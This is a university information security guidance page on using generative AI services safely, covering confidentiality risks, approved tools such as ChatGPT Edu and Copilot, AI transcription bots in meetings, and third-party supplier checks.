Use Generative AI services safely
Generative AI services are likely to proliferate over the coming years. Many university staff and students are already making use of them, so does their use pose a cyber security threat to the university?
Gartner describes Generative AI as a capability that can “learn from existing artifacts to generate new, realistic artifacts (at scale) that reflect the characteristics of the training data but doesn’t repeat it. It can produce a variety of novel content, such as images, video, music, speech, text, software code and product designs”. ChatGPT is a type of generative AI service based on a large language model (LLM) developed by OpenAI and it uses deep learning techniques to generate a variety of content, including human-like text responses to a wide range of prompts.
At a glance
Wherever possible, use the University licenced generative AI tools, ChatGPT Edu and Microsoft 365 Copilot
Ensure a third-party security assessment has been completed before using any other generative AI service, and take care when sharing personal data on these services
Be cautious about the use of AI bots in Teams meetings, and take precautions to reduce security risks
Risk to confidentiality
The main information security risk to the university in using generative AI cloud services is in relation to a loss of confidentiality. The university has an information classification scheme with three levels of confidentiality: Public, Internal and Confidential.
Information classified as Public does not carry a confidentiality risk. Information classified as Internal or Confidential carries risk. Before any processing of Internal or Confidential information using generative AI services, the following steps must be taken to mitigate risk.
1. As with all service providers holding or processing university information, information supplied to the tool in the form of questions or other artefacts is typically stored by the third-party service provider and is subject to the threats from cyber criminals and other malicious actors, such as hostile nation states. Therefore, all cloud-based Generative AI tools should be subject to a security risk assessment before being used. The Information Security GRC Team has a TPSA tool to help complete an assessment. It is generally not possible to complete a full assessment for free and open-source services and in such cases they should not be used for confidential information.
2. Information provided to generative AI services may be accessible by the service provider, its partners and sub-contractors and is likely to be used in some way, such as to train AI models. This is particularly likely when the service is free to use. Check service agreements for conditions on usage and ownership and if not explicitly set out in an agreement, the service carries an unknown risk to confidentiality. If any personal data is processed using generative AI, and you fail to opt out of the use of that data by the third party, this secondary processing must be considered in the data protection by design work. In particular, you must ensure that you have been transparent with those whose data may be fed into the generative AI model and alert them to any secondary processing that may occur.
Data Integrity
It is important to check generated output, particularly if used to produce code and sensitive output, as it may be false or misleading. One potential cyber risk is "poisoning" AI training data to manipulate the behaviour of the model and cause it to produce malicious output. This is an emerging threat. We will continue to watch this and other evolving threats and update our advice accordingly.
University-licensed generative AI tools
Two major generative AI tools, ChatGPT Edu and Copilot for Microsoft 365, have been made available for licensing by University departments and colleges via the University's AI and Machine Learning Competency Centre. The Information Security GRC Team has some specific guidance relating to risk to confidentiality from use of these tools under a licence from the Competency Centre, as below. Our generic guidance regarding the potential unreliability of outputs from generative AI tools and consequent data integrity risk continues to apply to generative AI tools licensed via the Competency Centre.
ChatGPT Edu
ChatGPT Edu licensed via the Competency Centre has been approved for processing of Confidential University data by the Information Security team. University data processed by ChatGPT Edu under a Competency Centre licence will not be used to train the AI model. However, any processing of personal data using ChatGPT Edu should still be discussed with the Information Compliance team, to ensure that the processing complies with general data protection principles.
Copilot for Microsoft 365
Copilot for Microsoft 365 has read access to all information accessible to a licensed user via their University Microsoft 365 account. Access permissions are often poorly managed and this can go unnoticed. However the ability of Copilot to comb through large volumes of information increases the risk to confidentiality of University data. Departments and colleges purchasing a Copilot for Microsoft 365 licence should initiate reviews of access permissions and issue advice on permissions management prior to implementation of Copilot. Users should ensure that any processing of personal data with Copilot complies with general data protection principles as for processing of such data with any other tool.
AI transcription bots in meetings
The use of AI-based transcription bots as participants in Teams meetings is becoming more widespread. Any use of such services should consider the following.
- There should be no use of unapproved AI transcription bots in Teams meetings by any participants.
- It is permissible to record meetings using the inbuilt Teams Transcription facility or Microsoft's Copilot subject to appropriate data protection considerations.
- Use of any AI transcription bot services other than the inbuilt Teams Transcription or Microsoft’s Copilot are subject to the same third party security assessment requirements as other third party services used to process University data.
- Meeting options should be set by the organisers so as to prevent internal or external meeting participants from adding unapproved transcription bots. For further guidance on meeting options to prevent unapproved bots please see this article.
- For Teams meetings organised by external parties, University members should either request that any AI transcription bot added by the external party is removed, or else avoid discussing any non-Public University information in the meeting.
- Use of AI transcription bots, including use of the inbuilt Teams Transcription or Microsoft’s Copilot under a University licence, may raise additional non-security related data protection concerns that need to be discussed with the Information Compliance team.
Use of Generative AI to launch cyber attacks
Aside from use of generative AI to process University data, there is a lot of discussion about the use of generative AI services by criminal groups and other types of cyber attacker, for example to develop malware, write convincing phishing emails or create deepfake videos. Awareness is key to preventing this type of attack, as is adherence to the extant University information security policy and underpinning baseline security standard, to ensure a good level of security.
Further support
Please contact the Information security GRC team grc@infosec.ox.ac.uk for support on information security issues.
If you are intending to provide personal data in the use of Generative AI you should seek advice from your local information governance lead, or the Information Compliance team information.compliance@admin.ox.ac.uk.
Working with third parties
Before you entrust the University's data or information to any partner or supplier, you need to be sure they can and will keep it safe from attack.
In order to ensure that third-party partners and suppliers meet the standards of information security required by the University and your division, department or faculty, you must:
- Maintain an up-to-date record of all third parties that access, store or process University information on behalf of your division, department or faculty
- Ensure that, for all new agreements with third parties, due diligence is exercised around information security and that contractual arrangements are adequate
- Ensure that information security arrangements contained in existing agreements are reviewed and are adequate
- Monitor the compliance of third parties against your information security requirements and contractual arrangements
Contact us
Please contact the Information security GRC team grc@infosec.ox.ac.uk for support on information security issues.
If you are intending to provide personal data in the use of Generative AI you should seek advice from your local information governance lead, or the Information Compliance team information.compliance@admin.ox.ac.uk.